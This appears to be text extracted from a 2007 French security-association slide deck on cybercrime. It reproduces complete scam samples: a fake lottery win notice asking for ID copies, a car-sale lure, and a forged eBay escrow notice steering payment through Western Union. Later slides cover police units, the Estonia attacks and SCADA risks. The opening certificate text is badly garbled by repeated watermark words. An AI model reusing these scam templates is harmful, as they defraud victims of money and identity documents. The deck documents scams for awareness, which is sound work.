GATES Fondation et COMPASSION Certificat BILL GATES Fondation INTERNATIONALE, Certificat BILL GATES Fondation représenté Certificatrespectivement BILL GATES par Mme Fondation ISABELLE Certificat CHEVALIER BILL GATES Fondationet Mr Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILLANDRE GATES DUSSELIER Fondation Certificat sous la BILL superv GATESision Fondationde MAITRE Certificat BOHUI BILL ADRIEN GATES Fondation pour le Ministère Certificat BILLde GATES Fondation la Certificat Justice .BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL BILL GATES GATES FONDATION Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation
Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES DIRECTRICE DES OPERATIONS Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation ISABELE Certificat CHEVALIER BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation From: euromillions euromillions To: [email protected] Cybercrime 2007 Sent: Saturday, November 24, 2007 10:06 PM Subject: WINNER E-LOTTERY
Réf: 10205 Groupe: 12/25/0360 Code représentant:03
NOTIFICATION:
Nous avons le plaisir de vous informer du tirage au sort du programme de la lotterie anglaise euro millions qui s’est tenu le 01novembre 2007 à Londres. Votre adresse électronique attachée à un numéro de ticket: 69475600545-721 avec Numéro de série : 8867/04 a tiré les chiffres gagnants : 31-6-26-13-35-7, qui vous ont par la suite permis de gagner dans la 2ème catégorie.
Vous avez donc, été tiré au sort pour bénéficier d’une somme totale 1.500.00€ (Cent cinquante milles Euros) en liquide, crédité au fichier KPC/9080118308/02. La cagnotte totale de €100 millions a été partagée parmi les Cinquantes (50) premiers heureux gagnants de cette catégorie.
Notez s'il vous plaît que vos chiffres gagnants sont compris dans la liste de notre agents représentatifs en Europe comme indiqué sur le coupon de jeu. Par conséquent, votre lot de 1.500.00 € (Cent cinquante Mille Euro) vous sera versé par notre filiale bancaire à Londres. Notre agent commencera le processus pour faciliter la sortie de vos fonds aussitôt que vous prendrez contact avec lui.
Tous les participants ont été choisis de façon aléatoire sur la toile Internet grâce à un système informatique de tirage au sort. Cette promotion a lieu annuellement. Pour des raisons de sécurité, nous vous conseillons de tenir vos informations de victoire confidentielles jusqu’à ce que votre dossier ait été traitée et que votre argent vous ait été viré (envoyé) de la façon que vous considérerez convenable. C'est une partie des mesures de précaution pour éviter les cas de double revendication de gain et l'usage abusif de ce programme par quelques éléments sans scrupules. Soyez Prévenu.
Ne repondez a notre sponsor de diffusion .
Pour rentrer en possession de votre lot,veuillez faire parvenir votre copie de carte d'identitée ou de passeport a jour (scannée en copie jointe afin de recevoir votre ticket gagnant ) entrez s'il vous plaît en contact uniquement avec le représentant des gagnants francophone avec les informations ci-dessus pour le traitement de votre dossier et mise à jour de votre dossier
Agent: CARLOS ALBIN Contacter Uniquement Notre agent pour toutes les informations
Contact Agent
NOM ET PRENOMS : CARLOS ALBIN mail: [email protected] ou [email protected]
PROCEDURE
Dès la réception de ce mail de félicitation
1-Sachez que sans mise a jour de votre nouvelle situation financiere,nous ne pouvons vous transferez votre gain cela dit l'huissier accredité se chargera uniquement de tous vos documents d'ordre juridique [email protected] + 33 1 5325,administratif 0880 http://www.clusif.asso.fr/ 17/01/2008 CLUSIF > 142
2-La copie de carte d'identité ou de passeport a jour par mail (scannée en copie jointe enfin de recevoir Cybercrime 2007 votre)
3-L'adresse complète de votre lieu d'habitation (adresse géographique, téléphone, fax, profession)
L'agent vous introduira par la suite auprès de l'huissier. Pour éviter des délais inutiles et des complications, rappelez s'il vous plaît dans toutes vos communications avec l’agent désigné ; vos numéros de référence/groupe.
Pour éviter des délais inutiles et des complications, rappelez s'il vous plaît dans toutes vos communications avec nous ou notre agent désigné; vos numéros de référence/groupe. Recevez les félicitations de tout le personnel de ce programme.
Merci de participer à notre programme promotionnel de loterie.
Le code d'accès restera valable 3 jours, ainsi vous aurez tout le temps d'en faire profiter vos amis et votre famille.
NB Nous agissons conformément aux règles mondiales contre le blanchiment d’argent, le terrorisme ,les violations des droits de l’homme ainsi que le financement de rebellion .
Nous vous certifions qu’aucune somme d’argent ne sera retirée de votre gain jusqu'à ce que vous soyez en possession totale de votre gain.
IMPORTANT Ce mail est conforme à la législation en vigueur et à la position de la CNIL du 17 février 2005 sur la prospection par courrier électronique dans le cadre professionnel (CNIL : échos des séances 02/03/2005). Conformément à l'article 34 de la loi 78-17 du 6 janvier 1978 relative à l'informatique, aux fichiers et aux libertés, vous disposez d'un droit d'accès, de rectification des données nominatives vous concernant.
Acceder a Notre site Web: http://gagner-euromillions.levillage.org/euromillions/loterie-anglais- euromillions.htm.
CARLOS ALBIN Coordinateur International de la Loterie Anglais
CLUSIF > [email protected] + 33 1 5325 0880 Descubre el nuevo buscador Orangehttp://www.clusif.asso.fr/ ¡Que no te lo cuenten! 17/01/2008 143 Cybercrime 2007
Cher Monsieur,
Je suis le premier propriétaire de la voiture. La voiture est en bon état, aucun problèmes. Je vois de votre email que vous êtes intéressé par l'état de la voiture ainsi vous devez savoir que la voiture est 100% fonctionnant et regardant très bon, aucunes pailles ou bosselures, aucunes éraflures ou n'importe quel genre de dommages, aucune inondation ou détruit ,aucun problème de moteur, l'intérieur ne semble pas grand, est état nouvel parce que j'ai ai pris soin de lui l'aime . J’ai acheté la voiture en France et j’ai toujours les documents français d’enregistrement. J’habite à Rome , L'Italie et j’ai la voiture ici avec moi. Je peux vous livrer la voiture. Email moi si vous voulez acheter la voiture. Le prix d’achat immédiat est de 5500 euros .Les coûts d’expédition sont inclus dans le prix ! J’ai quelques problèmes de famille et j’ai besoin d’argent pressant, c’est pourquoi le prix est si bas.J'ai décidé que le paiement soit fait en utilisant la sécurité d'Ebay. Je veux saisir cette occasion de vous assurer que cette affaire est 100% légitime. J'ai décidé que le paiement à accomplir en utilisant la sécurité d'Ebay parce que je veux saisir cette occasion de vous assurer que cette affaire est 100% LEGITIME. Votre argent sera gardé par eBay jusqu'à ce que vous receviez la voiture et leur envoyiez la confirmation que vous êtes satisfaits du produit reçu. Au cas où vous ne voudriez pas garder toute la voiture que vous devrez faire doit les demander un remboursement et vous serez totalement remboursés en 5 jours. J'espère que je vous ai dit tout ce que vous devez savoir et je continuerai à chercher autres acheteurs possibles jusqu'à ce que vous m'informerez que vous voulez aller en avant avec l'affaire. Vous devez savoir que si vous décidez d'acheter la voiture j'aurai besoin de votre nom et prénoms et adresse d'expédition (votre nom ebay y compris) aussitôt que possible afin d'envoyer vos détails à eBay et commencer la transaction.
PS: désolé pour le mauvais français. J'utilise un traducteur de logiciel pour traduire mes messages.
Cordialement,
Brandi Carpenter
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 144 eBay a envoyé ce message à un membre enregistré eBay.
Votre nom inscrit est inclus pour montrer ce message provenu d'eBay. Voici la protection d'achat pour votre transaction d'article : 1975 Cobra Cabriolet Le vendeur nous a envoyé les documents suivants: -certificat d'immatriculation -certificat de non-gage -certificat de dédouannement -certificat de conformité européenne -carnet d'entretien -facture d'achat -carte d'identite -passeport
La politique d'intimité de notre compagnie nous interdit de vous envoyer les documents. Nos experts du Service Juridique ont reçu et ont vérifié les documents du vendeur. Selon nos experts vous pouvez acheter la voiture sans risque. Les avis de nos experts sont basés sur leur connaissance étendue. Nous pouvons vous garantir que: -la voiture n'a aucun accident. -le vendeur est le propriétaire de la voiture. -la voiture n'est pas gagé. -la voiture a passé l'inspection technique. La voiture n'a pas des défauts mécaniques. -la voiture peut être enregistré en France sans problème.
Pour des raisons de sécurité vous n'effectuerez pas le paiement directement au vendeur. Vous effectuerez le paiement à notre agent local d'Italie, madame Olivia Tunder. Le vendeur a accepté de payer les frais pour cette transaction. Au lieu de 5500 euros vous pouvez envoyer à notre agent seulement 5200 euros. Après que vous avez envoyé le paiement à notre agent nous instruirons le vendeur de vous envoyer votre article acheté. Après que vous receviez et examiniez votre article acheté, si vous convenez, notre agent libérera l'argent au vendeur.
Voici les instructions pour effectuer le paiement:
1) Localisez le bureau de Western Union (à la Poste) le plus proche. Pour localiser un bureau de Western Union, clic ici.
2) Effectuez le paiement avec argent comptant (5200 euros) à notre agent.
Voici le nom et l'adresse du notre agent: NOM: Olivia Tunder RUE: 94 Via Torre Rossa VILLE: Rome 00165 PAYS: Italie
3) Envoyez-nous à 08-2667-5976 (fax) les copies des reçur de paiement.
Assurez-vous que vous avez placé votre fax sur la haute qualité. Quand vous effectuez le paiement a Western Union svp se rappeler de suivre ces règles simples:
1) écrivent votre adresse complète (rue, ville, pays, numéro de téléphone) sur la reçu du Western Union.
2) on ne vous permet d'écrire rien environ eBay sur la reçu du Western Union. Ceci est considéré "publicité masquée" et strictement interdit par Western Union.
Votre transaction avec le vendeur a été automatiquement assurée par notre compagnie contre des achat, votre argent sera remboursé. Nous, eBay France, déclarons officiellement que nous prenons le plein responsability pour la sécurité et la confidentialité de cette transaction. Ne pas répondre à cet email, car votre réponse ne sera pas reçue.
Copyright © 2007 eBay Inc. Tous droits réservés. Les marques commerciales et marques mentionnées appartiennent à leurs propriétaires respectifs. eBay et le logo eBay sont des marques déposées de eBay Inc.
Cybercrime 2007 The response from institutions
•National Police Directorate •National Gendarmerie Directorate (STRJD-NTECH) •Police Prefecture (BEFTI-BFMP)
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 146 Cybercrime 2007 The OCLCTIC Decree No.2000-405 of May 15, 2000
•Interministerial authority •National competence � Centralization and documentation � Operational role � Prevention of criminal activity � Statistical analysis •Fight against sensitive activities of international scope
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 147 Cybercrime 2007 The OCLCTIC
Tasks: On the national level •Centralization of information and coordination •Specialized criminal police investigations that are sensible or confidential of national or international scope.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 148 Cybercrime 2007 The OCLCTIC
Tasks: On the national level •Technical service to central and local services, - for statements or searches, - during hearings. •Training of ESCI (specialized IT crime investigators)
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 149 Cybercrime 2007 The OCLCTIC
•Prevention of criminal activity: -Reports of the Observatory for Payment Card Security -French Banking Federation, GIE CB (interbank bank card system), Association of French Mobile Operators, etc. -Reporting of illegal content on the Internet
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 150 Cybercrime 2007 The OCLCTIC
Tasks - On the international level: •National Interpol contact, managing messages from National Central Bureaus, •G8 contact and participation in the high tech crime working group. •European Commission– Expert Group, •Member of the Interpol “High Tech Crime” and Europol Analytical Work Files (AWF) working groups
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 151 Cybercrime 2007 Challenges
•International cooperation •Prevention •Adaptation of national services to face new threats
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 152 Cybercrime 2007 2007 Overview
�Sophistication of attacks
� Malicious intent on eBusiness � Credit card fraud via Internet � Scams via auction sites
� Notable events � “Cyberwar” in Estonia � “Chinese” cyberattacks � Security stakes for SCADA infrastructures
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 153 Cybercrime 2007 Notable event: “Cyberwar” in Estonia
Internet attacks from late April to mid-May after a monument commemorating Russian soldiers (WWII) was moved. Street demonstrations Defacement of Web sites, DoS (denial of service) attacks against Estonian government sites and infrastructures Government program for the development of new technologies (Estonian Information Society Strategy 2013) Profusion of neologisms in the press and in blogs: cyberwar, world war web, etc. Russia is accused…
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 154 Cybercrime 2007 Notable event : “Cyberwar” in Estonia
Mode of operation � Several waves of varying Length of 128 DoS attacks (source: Arbor) length and intensity 6% 13% �As long as 10 heures 6% �An initial “emotional” 13% reaction (April 27-29) < 1 min. < 60 min. � “Traditional” DoS attacks 1
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 155 Cybercrime 2007 Notable event : “Cyberwar” in Estonia
Cyber-demonstration (violent), yes ; militarized attack (cyberwar)... � Nothing established but causes a problem for the State for managing the rapid, “spontaneous” emergence of action groups on the Web, sometimes even linked-synchronized with street demonstrations
Which preparation, reaction by State services? Growing need for transnational collaboration. Some interpellations were done…
The stakes remain the sabotage of infrastructures, national and international opinions of the events....
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 156 Cybercrime 2007 Webography
http://www.statesmanjournal.com/apps/pbcs.dll/article?AID=200880 1120306&template=printart
http://www.ecrans.fr/Cyber-offensive-contre-l-Estonie.html http://asert.arbornetworks.com/2007/05/estonian-ddos-attacks-a- summary-to-date/
http://www.smh.com.au/news/Technology/Estonia-urges-firm-EU- NATO-response-to-new-form-of- warfarecyberattacks/2007/05/16/1178995207414.html#
http://www.informationweek.com/story/showArticle.jhtml?articleID= 201202784 http://www.theregister.co.uk/2007/05/07/estonian_attacks_suspect/
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 157 Cybercrime 2007 Notable event : “Chinese” cyberattacks
China has already been the focus of discussions: � Lead paint used on children’s toys � Inflammability of textiles � Food in violation of health regulations � Etc.
What was the context surrounding this media hype? � For some, the APEC summit (Asia Pacific Economic Co- operation) of the following week � For others, the approaching 17th Congress of the Chinese Communist Party the following month (see IOL no.554)
=>Work of media pressure?
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 158 Cybercrime 2007 Notable event : “Chinese” cyberattacks Chinese attack(s) � June, the Pentagon (US Defense Secretary) e-mail service is compromised � “…John Hamre, a Clinton-era deputy defence secretary involved with cyber security, said that while he had no knowledge of the June attack, criminal groups sometimes masked cyber attacks to make it appear they came from government computers in a particular country” � “ …National Security Council said the White House … consider whether the administration needed to restrict the use of BlackBerries…”
� American code name for these operations: “Titan Rain” � Late August, Trojan Horses and a release from the German BfV “…Die Angriffe kamen fast täglich - aus Lanzhou in Nordwest-China, aus Kanton oder aus Peking…” (Spiegel) …but already a release in February: “Chinesische Hacker spionieren deutschen Mittelstand aus” (Spiegel)
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 159 Cybercrime 2007 Notable event : “Chinese” cyberattacks Chinese attack(s)
� September, warnings from the British government without mention of a particular mode of operation…except in December, Trojan horse: espionage at Rolls-Royce and Shell
� September, SGDN (France) rebound attacks � “I am not in a position to say if these attacks are the work of the Chinese government…we know that there was a Chinese site in the ‘loop’.”(SGDN in Le Monde)
� Australia and New Zealand are also victims of attacks
Various types of attacks… � But no comments on the disclosure, dysfunction, blockage or sabotage of an information system
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 160 Cybercrime 2007 Webography
http://www.ft.com/cms/s/0/9dba9ba2-5a3b-11dc-9bcd- 0000779fd2ac.html?nclick_check=1
http://www.ft.com/cms/s/0/9dba9ba2-5a3b-11dc-9bcd- 0000779fd2ac.html
http://business.timesonline.co.uk/tol/business/markets/china/article 2988228.ece
http://business.timesonline.co.uk/tol/business/industry_sectors/tech nology/article2980250.ece
http://www.spiegel.de/politik/deutschland/0,1518,502076,00.html http://www.spiegel.de/netzwelt/tech/0,1518,501954,00.html http://www.spiegel.de/wirtschaft/0,1518,465041,00.html http://www.guardian.co.uk/technology/2007/sep/04/news.internet http://www.lemonde.fr/web/article/0,1-0@2-3224,36-952776@51- 952866,0.html
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 161 Cybercrime 2007 Notable event : Security issues for SCADA infrastructures
SCADA: Supervisory Control And Data Acquisition � Large-scale distributed measurement and control system (wikipedia) � Transmission and distribution of essential resources and services: water, gas, electricity, chemical products or signalling systems, etc.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 162 Cybercrime 2007 Notable event : Security issues for SCADA infrastructures
A harder to implement security policy (source: INL Critical
Infrastructure Protection Center, 2007)
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 163 Cybercrime 2007 Notable event : Security issues for SCADA infrastructures
Revived awareness after the events of 2001 Traditional malicious acts but with potentially more serious effects � 2003, Slammer worm and nuclear plant (Ohio) � 2003, Nachi worm and DAB Diebold network; SoBig virus and railroad signalling (Florida) � 2007 (and 2000 in Australia), logical sabotage by a network administrator of a water supply system (California) � 2007, experimental destruction of an electric generator (Idaho for CNN)
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 164 Cybercrime 2007 Notable event : Security issues for SCADA infrastructures
2007, significant volume of White Papers, documentation on SCADA security � Idaho National Laboratory, NIST (SP800- 82), SANS, TSWG…
SCADA (in)Security � HITB SecConf 2007 (Malaysia) � 24C3 (CCC, Berlin)
An upcoming Clusif conference ☺
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 165 Cybercrime 2007 Webography
http://www.theregister.co.uk/2007/05/21/alabama_nuclear_plant_sh utdown/
http://www.informationweek.com/story/showArticle.jhtml?articleID=1 3100807
http://www.theregister.co.uk/2007/11/30/canal_system_hack/ http://www.networkworld.com/news/2007/112907-insider-charged- with-hacking-california.html
http://www.cnn.com/2007/US/09/26/power.at.risk/index.html http://www.theregister.co.uk/2003/11/25/nachi_worm_infected_dieb old_atms/
http://www.securityfocus.com/news/11351 http://www.forbes.com/2007/08/22/scada-hackers-infrastructure- tech-security-cx_ag_0822hack.html
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 166 Cybercrime 2007 In closing, we would have also liked to discuss…
� Use of hackers by the MPAA
� SAP hacking
� Fake calls to emergency services, “swatting” (American SWAT raids)
� Swedish hacker and Tor network monitoring
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 167 Cybercrime 2007 Webography
http://www.wired.com/politics/onlinerights/news/2007/10/p2p_hacker http://www.pcinpact.com/actu/news/39602-MPAA-TorrentSpy-pirate- bittorrent.htm
http://www.pcwelt.de/index.cfm?pid=844&pk=95454 http://blog.wired.com/27bstroke6/2007/11/guilty-plea-pho.html http://blog.wired.com/27bstroke6/2007/12/blind-hacker-sa.html http://blog.wired.com/27bstroke6/files/rosoff.pdf http://www.heise-security.co.uk/news/95778 http://www.theage.com.au/news/security/the-hack-of-the- year/2007/11/12/1194766589522.html
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 168